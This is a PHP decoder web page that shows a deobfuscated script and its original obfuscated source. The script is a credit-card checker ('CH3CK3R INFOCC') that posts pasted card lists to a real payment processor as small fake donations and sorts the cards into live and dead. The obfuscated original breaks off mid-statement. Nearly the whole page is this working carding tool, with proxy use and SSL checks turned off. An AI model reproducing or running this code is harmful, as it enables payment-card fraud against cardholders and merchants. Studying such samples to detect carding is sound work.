Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto Nl0fO; HRzoz: set_time_limit(9999999); goto eQoga; Uy4F6: $row = $result->fet..

Decoded Output download

<?php 
 goto Nl0fO; HRzoz: set_time_limit(9999999); goto eQoga; Uy4F6: $row = $result->fetch_assoc(); goto JSl67; rrwoT: function info($ccline, $type) { $iscvv = 1; $pattern = "/[:\|\\\/\s]/"; $line = multi_explode($pattern, $ccline); $typemy = explode(" ", $type); $typem = strlen($typemy[0]); $typey = strlen($typemy[1]); $amex = "american_express"; $visa = "visa"; $mast = "master"; $disc = "Discover"; foreach ($line as $col) { if (is_numeric($col)) { switch (strlen($col)) { case 14: if (substr($col, 0, 1) == 3) { $ccnum["num"] = $col; $ccnum["type"] = $amex; } break; case 15: if (substr($col, 0, 1) == 3) { $ccnum["num"] = $col; $ccnum["type"] = $amex; } break; case 16: switch (substr($col, 0, 1)) { case "4": $ccnum["num"] = $col; $ccnum["type"] = $visa; break; case "5": $ccnum["num"] = $col; $ccnum["type"] = $mast; break; case "6": $ccnum["num"] = $col; $ccnum["type"] = $disc; break; } break; case 1: if ($col >= 1 and $col <= 12 and !isset($ccnum["mon"])) { $ccnum["mon"] = checkMon($col, $typem); } break; case 2: if ($col >= 1 and $col <= 12 and !isset($ccnum["mon"])) { $ccnum["mon"] = checkMon($col, $typem); } elseif ($col >= 9 and $col <= 19 and isset($ccnum["mon"]) and !isset($ccnum["year"])) { $ccnum["year"] = checkYear($col, $typey); } break; case 4: if ($col >= 2009 and $col <= 2019 and isset($ccnum["mon"])) { $ccnum["year"] = checkYear($col, $typey); } elseif (substr($col, 0, 2) >= 1 and substr($col, 0, 2) <= 12 and substr($col, 2, 2) >= 9 and substr($col, 2, 2) <= 19 and !isset($ccnum["mon"]) and !isset($ccnum["year"])) { $ccnum["mon"] = checkMon(substr($col, 0, 2), $typem); $ccnum["year"] = checkYear(substr($col, -2), $typey); } else { $ccv["cv4"] = $col; } break; case 6: if (substr($col, 0, 2) >= 1 and substr($col, 0, 2) <= 12 and substr($col, 2, 4) >= 2009 and substr($col, 2, 4) <= 2019) { $ccnum["mon"] = checkMon(substr($col, 0, 2), $typem); $ccnum["year"] = checkYear(substr($col, -2), $typey); } break; case 3: $ccv["cv3"] = $col; break; } } } if ($iscvv == 1) { if ($ccnum["type"] == $amex) { $ccnum["cvv"] = $ccv["cv4"]; } else { $ccnum["cvv"] = $ccv["cv3"]; } return $ccnum; } else { return $ccnum; } } goto CpJ95; DGsHt: ?> 
SET NAMES utf8 mysql_set_charset ("utf8")<meta charset="utf-8"><title>CH3CK3R [ INFOCC ]</title><style>body,table{background:url(http://www.zemwallpapers.com/wp-content/uploads/2015/07/Full-Hd-Widescreen-Wallpapers-1920X1080-7.jpg)}</style><?php  goto mOiCz; VJ9BV: if ($conn->connect_error) { die("Connection failed: " . $conn->connect_error); } goto ZifgZ; CpJ95: function inStr($s, $as) { $s = strtoupper($s); if (!is_array($as)) { $as = array($as); } for ($i = 0; $i < count($as); $i++) { if (strpos($s, strtoupper($as[$i])) !== false) { return true; } } return false; } goto HVIjr; GYAY0: if (@$_POST["action"] == "exit") { unset($_SESSION["an"]); } goto A83lW; ekcTY: function _curl($url, $post = '', $usecookie = false) { $ch = curl_init(); if ($post) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); if ($usecookie) { curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie); curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); $result = curl_exec($ch); curl_close($ch); return $result; } goto lrEBR; vt0ZU: $username = "root"; goto A9A2z; oBKn9: $conn = new mysqli($servername, $username, $password, $dbname); goto VJ9BV; eQoga: $login = ''; goto g7Fn4; A9A2z: $password = ''; goto hXuUr; hXuUr: $dbname = "hassona"; goto oBKn9; mOiCz: error_reporting(0); goto DzSBG; Nl0fO: $servername = "127.0.0.1"; goto vt0ZU; wjeKJ: function multi_explode($pattern, $string, $standardDelimiter = ":") { $string = preg_replace(array($pattern, "/{$standardDelimiter}+/s"), $standardDelimiter, $string); return explode($standardDelimiter, $string); } goto rrwoT; DCh2G: $footer = "</body></html>"; goto GYAY0; p1DEQ: if ($_SESSION["an"] == 0) { echo $header; echo "<br><center><tr><td colspan="2" align="center"><strong>CH3CKER Mrx_Mo-PS AREA DE LOGIN </strong></td></tr><br><br>"; echo "<table><form method="POST"><tr><td>Usuario: </td><td><input type="text" name="login" value=""></td></tr><tr><td>Senha: </td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="            ENTRAR           "></td></tr></form></table></center>"; echo $footer; die; } goto DGsHt; DzSBG: error_reporting(0); goto Kp1A2; ZTwgQ: $auth = 1; goto IcgkZ; gFgaY: session_start(); goto HRzoz; adTeI: function checkYear($date, $type) { $len = strlen($date); if ($type == 4) { if ($len == 4) { return $date; } elseif ($len == 2) { return "20" . $date; } return $date; } elseif ($type == 2) { if ($len == 2) { return $date; } elseif ($len == 4) { return substr($date, -2); } return $date; } else { return false; } } goto wjeKJ; HVIjr: if ($_POST["cclist"]) { global $cookie; $cookie = tempnam("tmp", "avo" . rand(1000000, 9999999) . "tmp.txt"); $cclive = ''; $ccdie = ''; $ccerr = ''; $cccant = ''; $uncheck = ''; $limit = ''; $cclist = trim($_POST["cclist"]); $cclist = str_replace(array("\"", "\'"), array(""", "'"), $cclist); $cclist = str_replace("\xd
", "\xd", $cclist); $cclist = str_replace("\xa
", "\xa", $cclist); $cclist = explode("
", $cclist); $STT = 0; $TOTAL = count($cclist); $handle = fopen("proxies.txt", "r"); for ($i = 0; $i < count($cclist); $i++) { $ex2 = explode("|", $cclist[$i]); $ctype = $ex2[0]; $ccn = $ex2[0]; $ccmon = $ex2[1]; $ccyear = $ex2[2]; $cvv = $ex2[3]; $numr = rand(50, 5000); if ($handle) { $line = fgets($handle); } if ($ccn) { $STT++; $randAm = rand(100, 10000000); $randAmout = rand(5, 10); $randEmail = "urif948" . $randAm . "@" . $randAm . ".com"; $date = $ccmon . $ccyear; echo $ccyear; $linka = "https://direct.tranzila.com/process/?cc?cc"; $posta = "lang=il&pdesc=%D7%AA%D7%A8%D7%95%D7%9E%D7%94+-+Donation&track2=&company=ramzon&contact=shimon+kairb&email={$randEmail}&phone=032898422&city=&remarks=nothing&currency=1&supplier=mot&sum={$randAmout}&ccno={$ccn}&expmonth={$ccmon}&expyear={$ccyear}&mycvv=111&myid=056131311&xnpay=1&npay=0&fpay=0&spay=0&tranmode=&cred_type=1"; $s = _curl($linka, $posta, $cookie); if (inStr($s, ""004"")) { echo "{$STT}/{$TOTAL} | <font color=red>Die | " . $cclist[$i] . " " . " | Mrx_AmgedVip
</font><br>"; $ccdie .= $cclist[$i] . "\xa"; $handle = fopen("afterprox-die.txt", "a"); fwrite($handle, $cclist[$i]); } else { if (inStr($s, ""000"")) { echo "<font color=Green>{$STT}/{$TOTAL} | Live | " . $cclist[$i] . " " . " | Mrx_AmgedVip
</font><br>"; $cclive .= $cclist[$i] . "\xa"; $handle = fopen("non.txt", "a"); fwrite($handle, $cclist[$i]); } else { echo "<font color=red>{$STT}/{$TOTAL} | Love | " . $cclist[$i] . " " . " | Mrx_AmgedVip\xa</font><br>"; } } unlink($cookie); } } unlink($cookie); $per1 = percent(count(explode("
", $cclive)) - 1, count($cclist)); $per2 = percent(count(explode("
", $ccdie)) - 1, count($cclist)); $per3 = percent(count(explode("\xa", $ccinva)) - 1, count($cclist)); $per4 = percent(count(explode("\xa", $ccexp)) - 1, count($cclist)); $per5 = percent(count(explode("
", $cccant)) - 1, count($cclist)); $per6 = percent(count(explode("
", $limit)) - 1, count($cclist)); echo "<center>"; if ($cclive != '') { echo "<h2><font color=Green>InfoCC Live</font>{$per1}% (" . (count(explode("\xa", $cclive)) - 1) . "/" . count($cclist) . ")</h2>"; echo "<textarea wrap=off rows=10 style="width:90%">{$cclive}</textarea><br>"; } if ($ccdie != '') { echo "<h2><font color=Red>InfoCC Die</font>{$per2} % (" . (count(explod("
", $ccdie)) - 1) . "/" . count($cclist) . ")</h2>"; echo "<textarea wrap=off rows=10 style="width:90%">{$ccdie}</textarea><br>"; } if ($ccinva != '') { echo "<h2><font color=red>InfoCC Invalid</font> {$per3} %(" . (count(explode("
", $ccinva)) - 1) . "/" . count($cclist) . ")</h2>"; echo "<textarea wrap=off rows=10 style="width:90%">{$ccinva}</textarea><br>"; } if ($ccexp != '') { echo "<h2><font color=red>Exp</font> {$per4} % (" . (count(explode("
", $ccexp)) - 1) . "/" . count($cclist) . ")</h2>"; echo "<textarea wrap=off rows=10 style="width:90%">{$ccexp}</textarea><br>"; } if ($cccant != '') { echo "<h2><font color=orange>Checker CCs</font> {$per5} % (" . (count(explode("\xa", $cccant)) - 1) . "/" . count($cclist) . ")</h2>"; echo "<textarea wrap=off rows=10 style="width:90%">{$cccant}</textarea><br>"; } } else { ?> 
<form action=""method="POST"><fieldset><legend></legend><form action=""method="post"name="f"><link crossorigin="anonymous"href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css"integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7"rel="stylesheet"><link crossorigin="anonymous"href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap-theme.min.css"integrity="sha384-fLW2N01lMqjakBkx3l/M9EahuwpSfeNvV63J5ezn3uZzapT0u7EYsXMjQV+0En5r"rel="stylesheet"><script crossorigin="anonymous"integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS"src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script><center><br><textarea class="textarea"id="cclist"name="cclist"style="width:900px;height:200px"></textarea><br><br><?php  if ($row["m_flag"] == 0) { ?> 
<input class="btn btn-success"style="width:200px;height:40px"value="CHECK"name="submit"type="submit"><?php  } else { ?> 
<input class="btn btn-success"style="width:200px;height:40px"value="wrong"><?php  } ?> 
</center></p></form></fieldset><?php  } goto YUJIz; JSl67: error_reporting(0); goto gFgaY; vv5M_: function checkMon($date, $type) { $len = strlen($date); if ($type == 2) { if ($len == 2) { return $date; } elseif ($len == 1) { switch ($date) { case "1": $date = "01"; break; case "2": $date = "02"; break; case "3": $date = "03"; break; case "4": $date = "04"; break; case "5": $date = "05"; break; case "6": $date = "06"; break; case "7": $date = "07"; break; case "8": $date = "08"; break; case "9": $date = "09"; break; } } return $date; } elseif ($type == 1) { if ($len == 2) { switch ($date) { case "01": $date = "1"; break; case "02": $date = "2"; break; case "03": $date = "3"; break; case "04": $date = "4"; break; case "05": $date = "5"; break; case "06": $date = "6"; break; case "07": $date = "7"; break; case "08": $date = "8"; break; case "09": $date = "9"; break; case "10": $date = "10"; break; case "11": $date = "11"; break; case "12": $date = "12"; break; } return $date; } elseif ($len == 1) { return $date; } } else { return false; } } goto adTeI; A83lW: if ($auth == 1) { if (@$_POST["login"] == $login && @$_POST["password"] == $password) { $_SESSION["an"] = 1; } } else { $_SESSION["an"] = "1"; } goto p1DEQ; ZifgZ: echo "Connected successfully"; goto F3Slv; cQ6JK: $result = $conn->query($sql); goto Uy4F6; FFv6o: function getStr($string, $start, $end) { $str = explode($start, $string); $str = explode($end, $str[1]); return $str[0]; } goto vv5M_; IcgkZ: $style = "<STYLE>BODY{background-color: #000000; background: url(http://www.zemwallpapers.com/wp-content/uploads/2015/07/Full-Hd-Widescreen-Wallpapers-1920X1080-7.jpg);color: #C1C1C7;font: 8pt verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #121214;font-size: 8pt;color: #C1C1C7;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;border-color:black;}</style>"; goto bW4MD; Kp1A2: set_time_limit(0); goto ekcTY; bW4MD: $header = "<html><head><link rel="SHORTCUT ICON" href=""><title>CH3CK3R Vip !</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">" . $style . "</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>"; goto DCh2G; lrEBR: function percent($num_amount, $num_total) { $count1 = $num_amount / $num_total; $count2 = $count1 * 100; $count = number_format($count2, 0); return $count; } goto FFv6o; g7Fn4: $password = ''; goto ZTwgQ; F3Slv: $sql = "SELECT m_flag FROM user_flag"; goto cQ6JK; YUJIz: ?>

Did this file decode correctly?

Original Code

<?php
 goto Nl0fO; HRzoz: set_time_limit(9999999); goto eQoga; Uy4F6: $row = $result->fetch_assoc(); goto JSl67; rrwoT: function info($ccline, $type) { $iscvv = 1; $pattern = "\x2f\133\x3a\x5c\x7c\134\134\x5c\57\134\163\x5d\x2f"; $line = multi_explode($pattern, $ccline); $typemy = explode("\x20", $type); $typem = strlen($typemy[0]); $typey = strlen($typemy[1]); $amex = "\x61\155\x65\162\151\143\x61\156\x5f\x65\x78\x70\162\x65\x73\163"; $visa = "\x76\151\x73\141"; $mast = "\155\141\163\164\x65\162"; $disc = "\x44\151\x73\x63\x6f\166\x65\x72"; foreach ($line as $col) { if (is_numeric($col)) { switch (strlen($col)) { case 14: if (substr($col, 0, 1) == 3) { $ccnum["\156\165\155"] = $col; $ccnum["\164\x79\160\x65"] = $amex; } break; case 15: if (substr($col, 0, 1) == 3) { $ccnum["\x6e\165\155"] = $col; $ccnum["\164\171\160\x65"] = $amex; } break; case 16: switch (substr($col, 0, 1)) { case "\x34": $ccnum["\x6e\165\x6d"] = $col; $ccnum["\164\171\160\x65"] = $visa; break; case "\x35": $ccnum["\x6e\x75\155"] = $col; $ccnum["\x74\171\x70\x65"] = $mast; break; case "\x36": $ccnum["\x6e\x75\x6d"] = $col; $ccnum["\164\171\160\x65"] = $disc; break; } break; case 1: if ($col >= 1 and $col <= 12 and !isset($ccnum["\x6d\157\x6e"])) { $ccnum["\x6d\157\156"] = checkMon($col, $typem); } break; case 2: if ($col >= 1 and $col <= 12 and !isset($ccnum["\x6d\x6f\156"])) { $ccnum["\x6d\x6f\x6e"] = checkMon($col, $typem); } elseif ($col >= 9 and $col <= 19 and isset($ccnum["\x6d\x6f\x6e"]) and !isset($ccnum["\171\x65\141\x72"])) { $ccnum["\x79\145\141\162"] = checkYear($col, $typey); } break; case 4: if ($col >= 2009 and $col <= 2019 and isset($ccnum["\155\157\156"])) { $ccnum["\x79\x65\x61\x72"] = checkYear($col, $typey); } elseif (substr($col, 0, 2) >= 1 and substr($col, 0, 2) <= 12 and substr($col, 2, 2) >= 9 and substr($col, 2, 2) <= 19 and !isset($ccnum["\x6d\x6f\156"]) and !isset($ccnum["\171\145\x61\162"])) { $ccnum["\x6d\157\x6e"] = checkMon(substr($col, 0, 2), $typem); $ccnum["\171\145\x61\x72"] = checkYear(substr($col, -2), $typey); } else { $ccv["\143\166\x34"] = $col; } break; case 6: if (substr($col, 0, 2) >= 1 and substr($col, 0, 2) <= 12 and substr($col, 2, 4) >= 2009 and substr($col, 2, 4) <= 2019) { $ccnum["\155\x6f\156"] = checkMon(substr($col, 0, 2), $typem); $ccnum["\171\x65\141\162"] = checkYear(substr($col, -2), $typey); } break; case 3: $ccv["\143\166\x33"] = $col; break; } } } if ($iscvv == 1) { if ($ccnum["\164\171\x70\x65"] == $amex) { $ccnum["\143\166\x76"] = $ccv["\143\x76\64"]; } else { $ccnum["\143\166\x76"] = $ccv["\143\x76\x33"]; } return $ccnum; } else { return $ccnum; } } goto CpJ95; DGsHt: ?>
SET NAMES utf8 mysql_set_charset ("utf8")<meta charset="utf-8"><title>CH3CK3R [ INFOCC ]</title><style>body,table{background:url(http://www.zemwallpapers.com/wp-content/uploads/2015/07/Full-Hd-Widescreen-Wallpapers-1920X1080-7.jpg)}</style><?php  goto mOiCz; VJ9BV: if ($conn->connect_error) { die("\103\157\156\156\x65\x63\x74\151\x6f\x6e\x20\x66\141\x69\154\145\x64\x3a\40" . $conn->connect_error); } goto ZifgZ; CpJ95: function inStr($s, $as) { $s = strtoupper($s); if (!is_array($as)) { $as = array($as); } for ($i = 0; $i < count($as); $i++) { if (strpos($s, strtoupper($as[$i])) !== false) { return true; } } return false; } goto HVIjr; GYAY0: if (@$_POST["\141\143\x74\x69\x6f\x6e"] == "\145\x78\151\x74") { unset($_SESSION["\141\x6e"]); } goto A83lW; ekcTY: function _curl($url, $post = '', $usecookie = false) { $ch = curl_init(); if ($post) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "\115\x6f\172\x69\154\154\x61\x2f\x35\x2e\60\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\40\x4e\124\40\61\60\56\x30\x3b\40\x57\151\x6e\x36\64\x3b\40\x78\66\64\51\x20\x41\x70\160\x6c\145\127\145\142\113\151\164\57\65\x33\67\56\x33\x36\40\50\113\110\124\x4d\114\54\x20\x6c\x69\x6b\x65\x20\107\145\x63\153\x6f\51\40\x43\150\162\157\155\x65\57\x37\x34\x2e\x30\x2e\63\67\62\x39\x2e\x31\66\x39\x20\123\141\x66\141\x72\x69\57\65\x33\67\x2e\63\x36"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); if ($usecookie) { curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie); curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); $result = curl_exec($ch); curl_close($ch); return $result; } goto lrEBR; vt0ZU: $username = "\162\157\x6f\x74"; goto A9A2z; oBKn9: $conn = new mysqli($servername, $username, $password, $dbname); goto VJ9BV; eQoga: $login = ''; goto g7Fn4; A9A2z: $password = ''; goto hXuUr; hXuUr: $dbname = "\x68\x61\x73\x73\x6f\156\141"; goto oBKn9; mOiCz: error_reporting(0); goto DzSBG; Nl0fO: $servername = "\61\62\67\56\x30\56\x30\56\61"; goto vt0ZU; wjeKJ: function multi_explode($pattern, $string, $standardDelimiter = "\72") { $string = preg_replace(array($pattern, "\57{$standardDelimiter}\x2b\57\163"), $standardDelimiter, $string); return explode($standardDelimiter, $string); } goto rrwoT; DCh2G: $footer = "\x3c\57\142\157\144\171\76\74\57\x68\164\155\x6c\x3e"; goto GYAY0; p1DEQ: if ($_SESSION["\x61\156"] == 0) { echo $header; echo "\74\x62\162\76\74\x63\145\156\164\x65\162\x3e\x3c\164\162\x3e\74\x74\144\x20\143\x6f\x6c\x73\160\141\156\x3d\42\62\42\40\x61\154\151\147\x6e\75\x22\143\145\x6e\164\145\162\x22\x3e\x3c\x73\164\x72\x6f\x6e\x67\x3e\x43\110\63\103\x4b\x45\122\40\115\162\170\x5f\x4d\x6f\55\120\x53\x20\101\x52\x45\x41\x20\x44\x45\x20\x4c\x4f\x47\111\x4e\40\x3c\x2f\163\164\x72\x6f\x6e\147\x3e\x3c\x2f\164\144\76\74\x2f\x74\162\x3e\x3c\142\162\x3e\74\x62\162\76"; echo "\74\x74\x61\x62\154\145\76\74\x66\x6f\162\x6d\40\155\x65\x74\x68\157\x64\x3d\42\x50\x4f\x53\x54\42\76\x3c\164\162\76\74\164\x64\76\x55\x73\165\141\x72\x69\157\x3a\40\74\x2f\164\x64\76\x3c\x74\144\76\74\151\x6e\x70\x75\x74\x20\x74\171\x70\x65\x3d\x22\x74\145\170\x74\x22\40\x6e\x61\x6d\x65\x3d\x22\x6c\157\x67\x69\x6e\x22\x20\x76\141\x6c\165\x65\75\42\42\76\74\57\164\x64\x3e\74\57\164\x72\76\74\x74\162\x3e\x3c\164\x64\76\123\145\x6e\150\x61\72\40\x3c\57\x74\144\x3e\x3c\164\x64\76\74\x69\x6e\x70\165\x74\40\x74\171\x70\x65\75\x22\x70\141\163\x73\x77\x6f\x72\144\42\40\x6e\141\x6d\x65\75\42\x70\x61\x73\163\167\157\162\144\42\40\x76\141\x6c\165\x65\75\x22\42\76\74\x2f\x74\x64\76\x3c\57\x74\x72\76\x3c\x74\x72\x3e\74\x74\x64\76\x3c\57\x74\x64\76\74\164\x64\76\74\151\x6e\160\x75\x74\40\x74\x79\x70\145\x3d\42\163\x75\142\155\x69\164\x22\x20\x76\141\154\x75\145\75\x22\x20\40\40\x20\40\40\x20\40\x20\40\x20\x20\105\116\124\122\x41\x52\x20\40\x20\40\40\x20\40\x20\40\40\x20\42\x3e\74\57\164\144\76\x3c\57\164\x72\76\x3c\57\x66\157\x72\x6d\x3e\x3c\x2f\x74\x61\x62\154\x65\x3e\74\x2f\143\145\156\164\x65\x72\76"; echo $footer; die; } goto DGsHt; DzSBG: error_reporting(0); goto Kp1A2; ZTwgQ: $auth = 1; goto IcgkZ; gFgaY: session_start(); goto HRzoz; adTeI: function checkYear($date, $type) { $len = strlen($date); if ($type == 4) { if ($len == 4) { return $date; } elseif ($len == 2) { return "\62\x30" . $date; } return $date; } elseif ($type == 2) { if ($len == 2) { return $date; } elseif ($len == 4) { return substr($date, -2); } return $date; } else { return false; } } goto wjeKJ; HVIjr: if ($_POST["\x63\143\154\x69\163\164"]) { global $cookie; $cookie = tempnam("\164\155\160", "\x61\166\x6f" . rand(1000000, 9999999) . "\164\155\x70\x2e\164\x78\x74"); $cclive = ''; $ccdie = ''; $ccerr = ''; $cccant = ''; $uncheck = ''; $limit = ''; $cclist = trim($_POST["\x63\143\154\151\x73\x74"]); $cclist = str_replace(array("\134\x22", "\134\x27"), array("\42", "\47"), $cclist); $cclist = str_replace("\xd\15", "\xd", $cclist); $cclist = str_replace("\xa\12", "\xa", $cclist); $cclist = explode("\12", $cclist); $STT = 0; $TOTAL = count($cclist); $handle = fopen("\160\x72\157\170\151\145\x73\56\164\x78\164", "\x72"); for ($i = 0; $i < count($cclist); $i++) { $ex2 = explode("\174", $cclist[$i]); $ctype = $ex2[0]; $ccn = $ex2[0]; $ccmon = $ex2[1]; $ccyear = $ex2[2]; $cvv = $ex2[3]; $numr = rand(50, 5000); if ($handle) { $line = fgets($handle); } if ($ccn) { $STT++; $randAm = rand(100, 10000000); $randAmout = rand(5, 10); $randEmail = "\165\x72\x69\x66\71\x34\70" . $randAm . "\x40" . $randAm . "\56\143\157\155"; $date = $ccmon . $ccyear; echo $ccyear; $linka = "\x68\x74\164\160\x73\x3a\57\x2f\144\x69\x72\145\143\x74\56\164\162\x61\x6e\172\x69\154\x61\56\143\x6f\155\57\x70\162\157\143\x65\163\163\57\77\143\143\x3f\143\143"; $posta = "\x6c\141\x6e\x67\x3d\151\154\x26\160\x64\145\x73\x63\75\45\104\67\45\101\101\45\x44\67\45\101\x38\x25\x44\67\45\x39\x35\45\104\67\45\71\x45\45\x44\67\x25\x39\64\53\x2d\53\104\x6f\156\141\164\x69\157\156\x26\x74\162\x61\x63\153\62\x3d\46\143\x6f\x6d\x70\x61\156\x79\x3d\162\x61\x6d\x7a\157\156\46\x63\157\x6e\164\141\x63\164\x3d\163\x68\151\x6d\x6f\x6e\53\x6b\141\151\162\x62\x26\145\x6d\x61\x69\x6c\75{$randEmail}\46\160\150\x6f\156\x65\x3d\x30\x33\x32\70\x39\70\x34\62\62\x26\143\x69\164\x79\75\x26\x72\145\155\141\x72\153\x73\x3d\156\157\x74\x68\151\x6e\x67\46\x63\165\162\162\x65\156\143\x79\75\61\x26\163\165\160\x70\x6c\x69\x65\x72\x3d\x6d\x6f\x74\46\163\x75\x6d\75{$randAmout}\x26\143\x63\156\157\x3d{$ccn}\46\145\x78\x70\155\157\156\164\150\75{$ccmon}\46\145\170\x70\x79\145\141\162\75{$ccyear}\46\x6d\x79\143\x76\x76\x3d\x31\61\61\46\155\171\151\x64\75\x30\65\66\61\x33\x31\x33\61\61\46\170\156\160\141\171\75\61\x26\156\160\141\x79\75\60\x26\146\x70\x61\171\x3d\x30\x26\x73\x70\141\171\75\x30\46\x74\162\141\x6e\155\157\x64\145\x3d\46\x63\x72\145\x64\137\x74\x79\160\x65\75\x31"; $s = _curl($linka, $posta, $cookie); if (inStr($s, "\42\60\x30\x34\x22")) { echo "{$STT}\x2f{$TOTAL}\40\174\40\x3c\x66\157\156\164\x20\143\157\x6c\157\x72\x3d\x72\145\144\76\x44\x69\145\40\x7c\x20" . $cclist[$i] . "\40" . "\x20\x7c\40\x4d\x72\170\137\101\155\147\x65\x64\126\x69\160\12\74\x2f\146\157\x6e\164\x3e\x3c\142\x72\x3e"; $ccdie .= $cclist[$i] . "\xa"; $handle = fopen("\141\146\x74\x65\162\x70\162\157\x78\x2d\144\151\145\56\164\170\x74", "\141"); fwrite($handle, $cclist[$i]); } else { if (inStr($s, "\42\60\x30\x30\x22")) { echo "\x3c\x66\157\156\164\x20\x63\x6f\154\x6f\x72\x3d\x47\162\x65\x65\156\x3e{$STT}\x2f{$TOTAL}\x20\174\40\x4c\x69\166\145\40\x7c\40" . $cclist[$i] . "\x20" . "\40\x7c\40\115\162\x78\x5f\x41\155\147\145\x64\126\151\x70\12\74\57\x66\x6f\x6e\x74\76\74\142\162\76"; $cclive .= $cclist[$i] . "\xa"; $handle = fopen("\x6e\157\x6e\56\x74\x78\x74", "\x61"); fwrite($handle, $cclist[$i]); } else { echo "\x3c\146\x6f\x6e\x74\40\x63\157\154\157\162\x3d\x72\x65\144\76{$STT}\x2f{$TOTAL}\x20\x7c\x20\114\x6f\166\x65\x20\174\40" . $cclist[$i] . "\40" . "\40\174\40\115\162\170\137\101\155\147\x65\x64\x56\x69\x70\xa\x3c\57\146\x6f\x6e\x74\x3e\x3c\142\162\76"; } } unlink($cookie); } } unlink($cookie); $per1 = percent(count(explode("\12", $cclive)) - 1, count($cclist)); $per2 = percent(count(explode("\12", $ccdie)) - 1, count($cclist)); $per3 = percent(count(explode("\xa", $ccinva)) - 1, count($cclist)); $per4 = percent(count(explode("\xa", $ccexp)) - 1, count($cclist)); $per5 = percent(count(explode("\12", $cccant)) - 1, count($cclist)); $per6 = percent(count(explode("\12", $limit)) - 1, count($cclist)); echo "\x3c\143\145\x6e\164\x65\x72\76"; if ($cclive != '') { echo "\74\150\62\x3e\74\146\157\156\x74\x20\x63\x6f\154\x6f\x72\75\107\162\145\145\x6e\76\x49\x6e\146\x6f\103\103\40\114\x69\x76\x65\74\x2f\x66\x6f\x6e\164\x3e{$per1}\45\40\50" . (count(explode("\xa", $cclive)) - 1) . "\x2f" . count($cclist) . "\51\74\57\x68\x32\x3e"; echo "\74\164\145\170\164\141\x72\x65\x61\x20\167\x72\x61\x70\75\x6f\x66\x66\40\162\157\x77\163\75\x31\60\40\x73\164\x79\154\x65\75\42\167\x69\144\x74\150\x3a\x39\60\x25\42\x3e{$cclive}\74\x2f\164\145\170\164\x61\x72\145\x61\76\x3c\x62\x72\76"; } if ($ccdie != '') { echo "\74\x68\x32\x3e\x3c\146\x6f\156\164\40\143\x6f\154\x6f\x72\x3d\x52\x65\x64\76\x49\156\x66\x6f\103\103\x20\x44\x69\145\x3c\x2f\146\157\156\164\x3e{$per2}\x20\45\x20\50" . (count(explod("\12", $ccdie)) - 1) . "\57" . count($cclist) . "\x29\74\57\x68\62\x3e"; echo "\74\164\145\170\x74\141\162\145\x61\x20\167\162\141\x70\x3d\x6f\146\146\x20\x72\157\167\163\75\x31\x30\40\163\164\x79\x6c\145\75\x22\167\x69\144\x74\150\x3a\71\60\45\x22\76{$ccdie}\74\57\x74\145\170\x74\x61\162\145\x61\x3e\x3c\x62\x72\x3e"; } if ($ccinva != '') { echo "\74\150\x32\x3e\x3c\x66\x6f\x6e\164\40\x63\x6f\154\x6f\162\75\x72\145\x64\76\x49\156\x66\x6f\x43\x43\40\111\156\x76\141\154\x69\144\x3c\x2f\x66\x6f\156\164\76\40{$per3}\x20\45\50" . (count(explode("\12", $ccinva)) - 1) . "\57" . count($cclist) . "\51\74\x2f\x68\62\76"; echo "\x3c\x74\x65\x78\x74\x61\162\145\x61\x20\x77\162\141\x70\x3d\x6f\146\146\x20\x72\157\x77\x73\x3d\61\x30\x20\163\164\171\154\x65\75\42\167\x69\144\x74\150\x3a\71\60\45\x22\x3e{$ccinva}\x3c\57\164\145\x78\164\x61\162\145\141\x3e\74\142\x72\76"; } if 